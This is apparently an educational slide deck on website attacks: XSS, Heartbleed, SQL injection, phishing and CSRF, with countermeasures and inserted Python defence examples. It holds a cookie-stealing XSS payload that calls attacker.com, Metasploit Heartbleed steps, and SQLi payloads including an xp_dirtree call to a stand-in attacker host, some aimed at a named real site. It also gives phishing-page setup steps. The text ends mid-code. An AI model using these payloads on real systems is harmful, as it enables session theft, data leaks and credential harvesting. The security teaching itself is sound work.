Websitehacking 170818085707

CURRENT TECHNOLOGIES
Types of Websites

Static Websites
• Quick to develop
• Easy to host
• More secure
• Less easily hackable
• Requires web development expertise to update site
• Site not as useful to the user
• Content can get stagnant

Dynamic Websites
• Slower/Expensive to develop
• Hosting costs a little more
• Less secure
• Prone to hacking
• Much more functionalities
• Easy to update
• New content brings people back to the site and helps in the search engines
• Can work as a system to allow staff or users to collaborate
DYNAMIC WEBSITES
WEBSITE BASE
Website Technologies
• Markup Languages
  HTML
  CSS
  XML
• Web Servers
  Internet Information Services (IIS)
  Apache
• Programming and Scripting Languages
  JavaScript
  VBScript
  Php
  C#
  Perl
  Asp.net
• Databases
  SQL Server
  MYSQL
Ever come across a screen like this??
URL HIJACKING
• They buy badly spelt domains
• Make money from your mistake
• Fake website or phishing
• Redirect site from the famous URLs
• Infect with a drive-by download
Types of URL hijacking
• Paid Search Hijacking
• Display Hijacking
CLICKJACKING
• iframe
• Position
• Z-index
• Opacity
STROKEJACKING
It is extremely similar to clickjacking, in that a malicious site has a user doing things they don’t want to do. Except, this time, it’s with the keyboard instead of the mouse, hence the “stroke”. The attacking site gets the user to type (or cut and paste) the information the attacker is looking for. This could lead to another attack (if the user types JavaScript), or just to gathering a username and password. The user thinks they are logging into a site, but they’re really sending characters over to the attacker’s site.

TAPJACKING
• A hacking technique where a malicious application presents a fake user interface in order to obtain user events for a hidden action in the background.
• Like clickjacking on the web, tapjacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it.
• The tapjacking technique is mostly used against mobile applications and mobile websites.
Tools and Techniques Required to Perform Attacks

 WHOIS
 Robots.txt files
 HTTrack-clone a website
 BeEF Tool
 Electronic Data Gathering, Analysis and Retrieval (EDGAR)
 Shodan Search
 Google Hacking
 DNS Lookup
 Nslookup
 DIG (Domain information Groper)
 Netcraft
 Httprint
 Fierce
 Encoder and Decoder
OPEN SOURCE TOOLS
Commercial TOOLS
XSS
Content
 Definition
 Types
 Process
 Live Attack
 Risks
 Counter Measures
Definition
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
 XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
 A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.
XSS Types
 Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where untrusted user input is processed and stored by the server in a file or database without any validation. This untrusted data is later fetched from storage and reflected back in the response without encoding or escaping, resulting in code execution in the browser every time the stored data is included in a response.
- link in other website or email
XSS Types
 Non Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where untrusted user input is immediately processed by the server without any validation and is reflected back in the response without encoding or escaping, resulting in code execution in the browser.
- forum, bulletin board, feedback form
XSS Types
 Local (DOM based)
DOM Based XSS is a form of client-side XSS which occurs in an environment where the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. It occurs when untrusted data supplied at the source is executed as a result of modifying the DOM “environment” in the browser. DOM XSS occurs when the untrusted data is not escaped or encoded for the context in which it is used.
- PDF Adobe Reader, Flash Player
Process
1) An attacker finds an XSS hole in a web application.
2) The attacker creates an attack URL for stealing sensitive information and disguises it so that it appears legitimate.
Here it is, <script> document.location = "http://localhost/attacker.com/redirect.php?a=" + document.cookie</script>
3) The attacker distributes the malicious XSS link via social engineering to unsuspecting users.
4) When the victim logs in, the JavaScript embedded in the malicious XSS link executes and transmits the victim’s login information to the attacker.
XSS Risks
XSS can
1) Steal cookies
- Hijack the user’s session - Unauthorized access
2) Spy on what you do
3) Modify the content of a web page by
- Inserting images or words - Misinforming - Spreading bad reputation
4) Network mapping
5) XSS viruses
XSS Countermeasures
1) Content Filtering:
“The application may attempt to detect and remove all scripts from untrusted HTML before sending it to the browser.” Content filtering is otherwise known as sanitization. This defense technique uses filter functions to remove potentially malicious data or instructions from user input. Filter functions are applied after user input is read by a web application, but before the input is used in an operation or output to the web browser. Removal of scripts from untrusted content is a difficult problem for web applications that permit HTML markup in user input, such as blogs. To be completely effective in eliminating XSS, a filter function must necessarily model the full range of parsing behaviors pertaining to script execution for several browsers.
XSS Countermeasures
Challenges of Content Filtering:
Allowing all benign HTML user input, while simultaneously blocking all potentially harmful scripts in the untrusted output. Every control character that can be used to introduce attack code also has a legitimate use in some benign, non-script context. For example, the ' < ' character needs to be present in hyperlinks and text formatting, and the ' " ' character needs to be present in generic text content. Both are legitimate and allowed user inputs, but can be abused to mount XSS attacks. Browser behavior varies from browser to browser; it is complex to model, not entirely understood and not all known (especially for closed-source browsers like Microsoft Internet Explorer). Therefore, from a web application perspective, the task of implementing correct and complete content filter functions is very difficult, if not impossible.
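The contrast the two slides above draw, between a filter that tries to remove scripts and output encoding that makes the characters inert in their context, as an added example (not code from the slides): the cookie-stealing payload from the Process section and a benign comment are constructed inputs, and the page markup is assumed.

```python
import html
import json
import re

# Constructed inputs (not from the slides' demo site): the cookie-stealing
# payload quoted in the Process section, and a benign comment that
# legitimately contains '<' and '"', the two characters the slides single out
# as having both a harmless and an attack use.
PAYLOAD = ('Here it is, <script> document.location = '
           '"http://localhost/attacker.com/redirect.php?a=" + document.cookie</script>')
BENIGN = 'use <b>bold</b> when 1 < 2 and say "hi"'


def strip_all_tags(untrusted: str) -> str:
    """Naive content filter (sanitization): delete anything that looks like a
    tag.  It must know every way a browser can be made to run script, and it
    silently rewrites the user's text on the way through."""
    return re.sub(r"<[^>]*>", "", untrusted)


def encode_for_html_text(untrusted: str) -> str:
    """Output encoding for an HTML text or quoted-attribute context: <, >, &,
    " and ' become entities, so the browser displays them instead of parsing
    them.  Nothing is removed, so benign input survives intact."""
    return html.escape(untrusted, quote=True)


def encode_for_js_string(untrusted: str) -> str:
    """Output encoding for a JavaScript string literal inside a <script>
    block.  json.dumps quotes and backslash-escapes the value; <, > and & are
    additionally written as \\uXXXX so that a literal '</script>' inside the
    data cannot terminate the enclosing script element."""
    literal = json.dumps(untrusted)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_comment_page(untrusted: str) -> str:
    """Embed one untrusted value in two contexts of the same (assumed) page,
    encoding it separately for each context."""
    return ('<p class="comment">' + encode_for_html_text(untrusted) + "</p>\n"
            "<script>var lastComment = " + encode_for_js_string(untrusted) + ";</script>")


def untrusted_part_has_raw_tag(page: str) -> bool:
    """Check helper: after removing the page's own fixed markup, does any
    unencoded '<' remain in the part that came from the user?"""
    for own in ('<p class="comment">', "</p>", "<script>", "</script>"):
        page = page.replace(own, "")
    return "<" in page
```

The filter strips the benign comment's formatting while leaving a bare '<' behind; the encoders change nothing the user wrote and leave no parsable tag in either context.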
XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which scripts in the web page are authorized, leaving the browser to ensure the authorization policy is upheld.” Robust prevention of XSS attacks can be achieved if web browsers are made capable of distinguishing authorized from unauthorized scripts.
This approach can be implemented by
(a) creating a server–browser collaboration protocol to communicate the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a policy denying unauthorized script execution.
XSS Countermeasures
Challenges of Browser Collaboration:
Although this defense strategy is a compelling and effective long-term solution, its implementation will take a long time, because web applications adopting this approach require their users to employ modified browsers for protection from XSS attacks. To implement this there must be agreement on some standards for server–browser collaboration, then these new standards must be incorporated in the normal browser implementation. This is a long, complicated process that can take several years.
Ex: Browser-Enforced Embedded Policies (BEEP)


HEARTBLEED
Heartbleed is a security bug in the OpenSSL cryptography library.
OpenSSL is a software library to be used in applications that need to secure communications over computer networks against eavesdropping or need to ascertain the identity of the party at the other end.
It has found wide use in internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS protocols.
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are the most widely deployed security protocols used today. Essentially, they provide a secure channel between two machines operating over the Internet or an internal network.
What happened..??
 The Heartbleed vulnerability was announced to the world on 7th April 2014, as an OpenSSL vulnerability, together with a new code release (1.0.1g)
 It was found by the Google security team and Codenomicon
 It was reported that private keys for SSL certificates could be exposed
 Many big-name companies were vulnerable: big tech names, banks, law enforcement, intelligence agencies
 But...
What is the heartbeat extension?
 Heartbeat is an echo functionality where either side (client or server) requests that a number of bytes of data that it sends to the other side be echoed back.
 The idea appears to be that this can be used as a keep-alive feature, with the echo functionality presumably meant to allow verifying that both ends continue to correctly handle encryption and decryption
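The echo mechanism just described, with the missing bounds check that made it Heartbleed and the check the fix added, as an added model in Python (not OpenSSL's code): the heartbeat layout follows RFC 6520, and the bytes that sit after the record in server memory are a constructed sample passed in as a parameter.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16          # RFC 6520: at least 16 bytes of padding
HEADER_LEN = 1 + 2        # type byte + 16-bit payload_length


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a HeartbeatRequest: type, payload_length, payload, padding.
    claimed_length lets a caller write a payload_length that overstates the
    payload actually carried, which is the shape of a Heartbleed probe."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def respond_unpatched(record: bytes, memory_after_record: bytes) -> bytes:
    """Model of the vulnerable handler: it trusts payload_length and copies
    that many bytes starting at the payload.  When the claimed length exceeds
    the record, the copy continues into whatever follows the record in the
    process's memory (modelled here as memory_after_record)."""
    _msg_type, length = struct.unpack("!BH", record[:HEADER_LEN])
    buf = record + memory_after_record
    echoed = buf[HEADER_LEN:HEADER_LEN + length]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, length) + echoed + b"\x00" * MIN_PADDING


def respond_patched(record: bytes, memory_after_record: bytes) -> Optional[bytes]:
    """Model of the fixed handler: a request whose claimed payload plus the
    mandatory padding does not fit inside the received record is dropped
    silently, so nothing outside the record is ever read.  The memory
    argument is accepted only to keep the two handlers interchangeable."""
    if len(record) < HEADER_LEN:
        return None
    msg_type, length = struct.unpack("!BH", record[:HEADER_LEN])
    if msg_type != HEARTBEAT_REQUEST:
        return None
    if HEADER_LEN + length + MIN_PADDING > len(record):
        return None
    echoed = record[HEADER_LEN:HEADER_LEN + length]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, length) + echoed + b"\x00" * MIN_PADDING


def leaked_bytes(response: bytes, request: bytes) -> bytes:
    """Bytes in the echoed payload that were never part of the request,
    i.e. what the responder read out of its own memory."""
    _msg_type, length = struct.unpack("!BH", response[:HEADER_LEN])
    echoed = response[HEADER_LEN:HEADER_LEN + length]
    sent = len(request) - HEADER_LEN   # payload + padding the client really sent
    return echoed[sent:]
```

Because payload_length is a 16-bit field, one request can claim at most 65535 bytes, which is the "about 64k" per response the Metasploit walkthrough below refers to.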
Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, Heartbleed makes HTTPS less secure than plain
HTTP because attackers can obtain sensitive data without even having to
intercept traffic.

Initial reactions focused on:
• patching vulnerable web servers,
• revoking SSL certificates
• changing user passwords.

It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices which
will never receive a software update.
Let's see how to perform this attack with Metasploit..!!
 It can be performed with the powerful exploit framework Metasploit
 We'll see how it's performed step by step
 Step 1: Update Metasploit using msfupdate
 Step 2: Start Metasploit
 Kali > msfconsole
Metasploit startup screen
 Step 3: Find Heartbleed
 search heartbleed
 This would bring up two modules
 auxiliary/scanner/ssl/openssl_heartbleed
 and
 auxiliary/server/openssl_heartbeat_client_memory
 We'll use the first one
Step 4
 Use the auxiliary module
 use auxiliary/scanner/ssl/openssl_heartbleed
 This will load the heartbleed module
info
 Type
msf > info
 This reveals the options that need to be set in order to use this module, and a description of the module
Step 5
 Set options
 Although this module has numerous options, the critical one is RHOSTS
 Let's set it to a target website on the network that is still vulnerable to heartbleed
 msf > set RHOSTS 192.168.1.169
Step 6: Run the module
 Finally, set the option VERBOSE to true. This will provide us with verbose output.
msf > set VERBOSE true
 And let's run it
msf > run
 As we can see in the next screenshot, the server leaked about 64k bytes of what was in its memory
Success..!!
Let Us Define….
• Alice, Bob: Users of online services.
• Eve: A passive attacker (eavesdropper).
• Trudy: An active attacker who may exploit the Heartbleed bug by sending specially crafted heartbeat packets over an SSL (e.g. HTTPS) connection.
• yuri.com: A web site with vulnerable SSL software.
Since OpenSSL is so widely used, any web site should be considered as a potential yuri.com until proven otherwise.
Attack patterns and countermeasures
1. Extraction of sensitive data from vulnerable HTTPS servers
In this scenario Alice enters or consults sensitive data on yuri.com over HTTPS. Plain-text data lingers in the memory of the web server. Later, Trudy connects as a regular HTTPS client and exploits Heartbleed.
Countermeasures for end users
• Do not exchange sensitive information with a web site until they tell you they have dealt with Heartbleed.
Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.
2. Session hijacking from vulnerable HTTPS servers
In this scenario Trudy extracts session cookies rather than login credentials. This allows her to take control of Alice's account without waiting for her to enter her credentials.
Countermeasures for end users
• Log out of online services until they have dealt with Heartbleed.
3. Extraction of SSL private keys from vulnerable HTTPS servers
In this scenario Trudy extracts the SSL/TLS private key of yuri.com. Regardless of what happens next, leakage of private keys is always a major failure.
Lessons learned
• Protect private keys with a hardware security module.
Field reports
• Confirmed: Heartbleed Exposes Web Server's Private SSL Keys
4. Man-in-the-middle impersonation of online services
In this scenario mallory.com impersonates yuri.com after extracting its SSL private key. This so-called man-in-the-middle attack (MITM) is more dangerous than passive snooping because mallory.com can trick Alice into using a compromised certificate. It also allows mallory.com to defeat some multi-factor security measures.
Countermeasures for end users
• Check whether your browser detects revoked certificates.
• If it does not, inspect certificates manually.
Lessons learned
• Heartbleed will probably be the end of the current certificate revocation infrastructure.
5. Tor traffic correlation
Eve, an evil dictator, wants to establish that Alice is using Tor to communicate with george.com, a foreign human-rights organization. Eve can spy on all Internet traffic within her national boundaries but has no wiretapping authority in other countries. She exploits Heartbleed massively against vulnerable Tor exit nodes in order to match outgoing traffic with her local intercepts.
6. De-anonymization of hidden servers and users by malicious Tor nodes
Trudy sets up a number of malicious Tor guard nodes. She exploits the Heartbleed vulnerability against clients that connect to them, including Tor hidden servers and their users. Although Tor hidden services are encrypted end-to-end, Trudy can identify vulnerable users and servers based on plaintext data leaked by Heartbleed at each end. Besides, if she extracts the private key of a hidden service, she can impersonate it.
Field reports
• "Tor hidden services might leak their long-term hidden service identity keys to their guard relays."
7. Attacks against VPN servers
Alice is aware that most public WiFi networks provide no privacy. Therefore she has configured her smartphone and laptop to connect to the Internet through a VPN service provider, yuri.com. (Alternatively, she could be running her own VPN server at home, or using the VPN feature that comes bundled with her DSL modem or her NAS box.) Eve snoops on the WiFi network that Alice is currently using, notices SSL-based VPN traffic from her smartphone, exploits Heartbleed against the destination IP address, and retrieves either VPN keys or plaintext traffic.
Field reports
• Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs
• OpenVPN uses OpenSSL as its crypto library by default and thus is affected
Some General Countermeasures
 Do not use OpenSSL 1.0.1f.
 Disable the heartbeat extension.
 Change login credentials if your site is compromised.
DANGER:
OpenSSL, an open source project staffed by only 10 individuals and run on a limited budget, is used to secure millions of servers, ensuring the integrity of email, e-commerce, online banking and other properties, in many cases for multi-billion dollar companies.
Heartbleed obviously has wide-reaching implications, not only for the integrity of the Web, but also for mobile apps – but how much damage did it actually do prior to its discovery and patching?
How damaging is Heartbleed?
The issue has also spread to mobile devices. Android
apps, for instance, may connect to servers that could be
affected by Heartbleed. While not dedicated browsing
tools such as Google Chrome or Apple Safari, some of
these apps have their own internal browsers, blurring the
line between mobile software and the Web. That risk is
worth noting, not just for the OpenSSL exploit but for
future considerations about overall Internet security.
Looking ahead …
These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.
SQL Injection Attack
What is SQL?
SQL (Structured Query Language) is a programming language to manage databases.
The management systems that employ SQL are Microsoft SQL Database, Oracle, MySQL, PostgreSQL, and others.
What is SQL Injection
SQL injection, i.e. SQLi, refers to the injection attack in which the attacker executes malicious SQL queries that control a web application's database server.
The attacker can use SQL injection to:
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Classification of SQL injections
There are 3 major classifications:
1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi
In-Band SQLi Or Classic Attacks
Most attacks rely on basic SQL manipulation and are considered to be classic attacks. It includes
 WHERE clause modification
 UNION operator injection
 query stacking
WHERE Clause Manipulation: Any user input generally ends up in a WHERE clause of the database query.
Example:
In a login page where a username is entered, the SQL query looks like this:
 SELECT * FROM users WHERE name = '" + userName + "';
 If the "userName" variable is crafted in a specific way, the SQL statement may do more than the code author intended. Setting the "userName" variable as:
' OR '1'='1
 or using comments to even block the rest of the query:
' OR '1'='1' --
These user inputs render the SQL query like the following:
 SELECT * FROM users WHERE name = '' OR '1'='1';
 SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
SQL injection Using UNION: The UNION operator allows the attacker to extract sensitive information from the database.
 Example:
USER INPUT:
 ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a
GENERATED QUERY:
 SELECT id, name, description FROM products WHERE category = '' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a'
The crafted query returns usernames and passwords of all members in the database.
 Query stacking: Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures.
 Example
A classic attack using this technique could look like the following.
MALICIOUS USER INPUT:
 1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
 SELECT * FROM products WHERE productid=1; DELETE FROM products
Inference SQLi attack
The main intent of the attacker in an inference SQLi is identifying the injectable parameters and extracting the database schema.
Here no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band. It is also referred to as a Blind injection attack.
There are two well-known attack techniques that are based on inference:
 Boolean-based blind injection
 Time-based blind attacks
Boolean-based blind injection: Information is inferred from the behaviour of the page by asking the server true/false questions. If the injected statement evaluates to true, the site continues to function normally. If the statement evaluates to false, although there is no descriptive error message, the page differs significantly from the normally-functioning page.

Example:
This website shows some information which is stored in a database:
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean-based blind injection.
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
Time-based blind attack: For time-based attacks, the attacker needs to instruct the database to perform a time-intensive operation. If the web site does not return a response immediately, the web application is vulnerable to blind SQL injection. A popular time-intensive operation is the sleep operation.
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform a time-based blind attack the query will become:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1, sleep(10), false)
Out-of-band SQLi
 An out-of-band attack occurs when the attacker is unable to use the same channel to attack and gather results
 Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --
This will produce the following SQL query.
 SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --
 What happened is that there are now two separate queries that SQL Server will execute.
/* First Query */
 SELECT * FROM products WHERE id=1
/* Second Query */
 EXEC master..xp_dirtree '\\test.attacker.com\' --
 The second query is invoking the stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders for the folder named in the xp.
Recording of SQL attack
SQL Injection (SQLi)
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a relational database management system – RDBMS).
How SQL Injection works
 SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'
 # Define POST variables
 uname = request.POST['username']
 passwd = request.POST['password']
 # SQL query vulnerable to SQLi
 sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'"
 # Execute the SQL statement
 database.execute(sql)
What’s the worst an attacker can do with SQL?
 bypass authentication or even impersonate specific users.
 allow the complete disclosure of data residing on a database server.
 alter data, which affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.
 delete records from a database
 allow arbitrary execution of operating system commands on the database server
What is a SQL Injection Vulnerability?
 Non-Technical Explanation
 Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.
 Drive through route 66 and stop on bus stops if there are people on the bus stops.
 Drive through route 66 and do not stop on bus stops and ignore the rest of this form. if there are people on the bus stop.
What is a SQL Injection Vulnerability?
 Technical Explanation
 $statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw'";
 $statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
Different Types of the SQL Injection Vulnerability
 Error based SQL Injection
 Boolean Based SQL Injection
 Time based SQL Injection
 Out-of-Band SQL Injection Vulnerability
Impacts of the SQL Injection Vulnerability
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Preventing SQL Injection Vulnerabilities
 Server-side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response
 When developing web applications you should use prepared statements to prevent SQL injections. When using prepared statements the structure and data are separated and can be interpreted by the SQL server without risking that an attacker is able to change the structure of the SQL query for malicious purposes
What Can Be Done to Prevent SQL Injection Attacks?
 sanitization
 validation
Sanitization
 Sanitization usually involves running any submitted data through a function (such as MySQL's mysql_real_escape_string() function) to ensure that any dangerous characters (like " ' ") are not passed to a SQL query in data.
Validation
 attempts to ensure that the data submitted is in the form that is expected. At the most basic level this includes ensuring that e-mail addresses contain an "@" sign, that only digits are supplied when integer data is expected, and that the length of a piece of data submitted is not longer than the maximum expected length
Two ways:
 by blacklisting dangerous or unwanted characters (although hackers can often get around blacklists)
 by whitelisting only those characters that are allowed in a given circumstance, which can involve more work on the part of the programmer
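The WHERE-clause manipulation from the classic-attacks section, run against the prepared-statement and whitelist-validation defences described above, as an added example (not code from the slides): the in-memory SQLite table and its two accounts are constructed, and the digit-only rule for the id parameter is an assumption.

```python
import re
import sqlite3
from typing import List, Optional


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory users table; bob's row reuses the slides' sample."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "mysecretpw")])
    conn.commit()
    return conn


def find_users_dynamic_sql(conn: sqlite3.Connection, user_name: str) -> List[str]:
    """The slides' dynamic query: the input is concatenated into the WHERE
    clause, so the input can change the structure of the statement."""
    sql = "SELECT name FROM users WHERE name = '" + user_name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_users_prepared(conn: sqlite3.Connection, user_name: str) -> List[str]:
    """Prepared statement: the structure is fixed when the statement is
    compiled and the value is bound separately, so ' OR '1'='1 is just a
    user name that nobody has."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (user_name,))]


def validate_int_id(raw: str) -> Optional[int]:
    """Whitelist validation (assumed rule) for a numeric parameter such as
    ?id=519: only a short run of digits is accepted; anything else,
    including '519 and 1=1', is rejected before it reaches a query."""
    if re.fullmatch(r"[0-9]{1,9}", raw) is None:
        return None
    return int(raw)


def find_by_id(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """Validate, then bind: both defences combined for an id parameter."""
    row_id = validate_int_id(raw_id)
    if row_id is None:
        return []
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id = ?", (row_id,))]
```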
Other ways of prevention
 Trust no-one
 Don't use dynamic SQL when it can be avoided
 Firewall
 Update and patch
 Reduce your attack surface
 Use appropriate privileges
 Keep your secrets secret
 Don't divulge more information than you need to
Phishing
What is Phishing?
Phreaking + Fishing = Phishing
{Phreaking = making phone calls for free back in the 70’s}
Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
Target By Sector
Phishing Types
 Spear Phishing
 Clone Phishing
 Whaling
___________________________________________________________
Spear Phishing
Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is by far the most successful on the internet today, accounting for 91% of attacks.
Clone Phishing
A type of phishing attack where a legitimate email containing an attachment or link has had its content and recipient address taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version of the original.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and other high-profile targets within businesses, and the term whaling has been coined for these kinds of attacks.
HERE’S HOW IT’S DONE
Step: 1
Setting up a web page which looks similar to the original one.
Link :
http://a0145877.xsph.ru/
Step: 2
A php script which stores credentials to a file is what is required to harvest credentials
Step: 3
In the html page search for the submit form and change it to the written php script
STEP: 4 Host it in a server & Share The Link
PHISHING
DON’T GET HOOKED
DEFINITION
It is the attempt to obtain sensitive information such as usernames, passwords, and credit card details, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.
TYPES OF PHISHING
• Spear phishing
• Clone phishing
• Whaling
• Filter evasion
• Link manipulation
• Tabnabbing
How to protect yourself
1. Be wary of emails asking for confidential information
2. Make sure you familiarise yourself with a website's privacy policy
3. Watch out for generic-looking requests for information.
4. Never submit confidential information via forms embedded within email messages.
5. Never use links in an email to connect to a website unless you are absolutely sure they are authentic. Instead, open a new browser window and type the URL directly into the address bar
6. Make sure you maintain effective software to combat phishing
PHISHING COUNTERMEASURES IN DETAIL
Auto-Generate Domain-Specific Password
Hashing of passwords with a secret key along with the website domain name.
Due to this mechanism, it becomes really hard for the attacker to get the password.
Disadvantage
• Practical implementation is quite difficult.
• Many banks use multiple domains and sub-domains
• It’s a static solution

Web Browser’s PWD Database
Random passwords are generated and stored in the browser.
It is more “secure,” as the browser will only give the credentials to the right URL. If anything changes in the URL, it won’t pass credentials.
Disadvantage
• It doesn’t work fully with sub-domains.
• Even here, passwords are stored in plain text.
Phishing Scam Alert Add-ons/Extensions
The concept is like this: if the user visits any known fake/phishing URL, then the toolbar turns red.
If the site is merely a suspected phishing or fake site, then it turns yellow.
2FA—Two-Factor Authentication
It requires not only a username and password, but also some piece of information that only the user has (a physical token).
Encrypted Key Exchange Process—Prevent Dictionary Attacks
A series of protocols is implemented for encrypted key exchange.
The key is generated by combining the shared password.
This process takes place in such a way that the phisher can’t guess it.
These protocols were awkward to implement and use, and they were also too time-consuming.
Educating Your People
Conducting seminars and workshops on ethical hacking and Internet security in order to educate their employees.
This can be a quality step towards security awareness.
Logical awareness has to be raised.
CSRF
Content
 Definition
 Attack Process
 Screenshots
 CounterMeasures
 Tools
 References
Definition
 Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.
 CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
Definition Cont...
 With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
 If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth.
 If the victim is an administrative account, CSRF can compromise the entire web application.
Process
Browser → Target Website: Send login request
Target Website → Browser: Return login response with cookies
Browser → Malicious Website: Visit malicious website
Malicious Website → Browser: Return malicious code
Browser → Target Website: Send forged request with cookies
 Root cause of CSRF
 Existing browsers do not check whether a client actually initiates an HTTP request
Screenshots
Step 1 − Let us perform a CSRF forgery by embedding JavaScript into an image. The snapshot of the problem is listed below.
Step 2 − Now we need to mock up the transfer into a 1x1 image and make the victim click on the same.
Step 3 − Upon submitting the message, the message is displayed as highlighted below.
Step 4 − Now if the victim clicks the following URL, the transfer is executed, which can be found by intercepting the user action using Burp Suite. We are able to see the transfer by spotting it in the GET message as shown below –
Step 5 − Now upon clicking refresh, the lesson completion mark is shown.
Tool – OWASP CSRFTester

Test your applications for CSRF:
- Record and replay transactions
- Tune the recorded test case
- Run the test case from the exported HTML document

Test case alternatives (how the forged request is delivered):
- Auto-posting forms
- Evil iframe
- IMG tag
- XMLHttpRequest
- Link
Counter Measures
 The web application should insert random values (tokens), tied to the
specified user's session, into the forms it generates.
 The web application should re-authenticate the user every time they are
about to perform a particularly dangerous operation.

Counter Measures Cont..

Safe methods
1) "The GET and HEAD methods SHOULD NOT have the significance of taking an
action other than retrieval. These methods ought to be considered 'safe'"
(RFC 2616). In PHP, read state-changing parameters from the $_POST superglobal
and not from $_GET or $_REQUEST. Note that this alone does not stop CSRF: an
attacker's page can auto-submit a POST form just as easily (the auto-posting
form test case above); it only removes the image and link delivery routes.
2) Try to force the use of your own forms
- On form generation, store a unique token in the user's $_SESSION and in a
hidden field of the form
- On submit, check that the two match
-- Limits the attack to a single user
-- The attacker would need to obtain the user's valid form token AND session
cookie
- Put an expiry on form tokens
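The five-step process above and the synchronizer-token countermeasure, played out in one runnable model. This is an added example, not code from the slides: the bank application, its routes, the "browser" with its cookie jar and the attacker's auto-posting form are all hypothetical, and every request is a plain function call so nothing listens on a socket. The root cause is modelled in Browser.submit(), which attaches the bank's cookies to any request aimed at the bank, whoever built it; the defence is a per-session random token with an expiry, compared in constant time, that the attacker's page cannot read.

```python
"""CSRF attack against a toy bank, with and without a synchronizer token."""
import hmac
import secrets
import time

TOKEN_TTL = 600.0  # assumed lifetime of a form token, in seconds


class Bank:
    """Hypothetical target site. require_token=False is the vulnerable version."""

    def __init__(self, require_token):
        self.require_token = require_token
        self.sessions = {}   # session id -> {"user", "csrf", "issued"}
        self.balances = {"alice": 100, "mallory": 0}

    def login(self, user):
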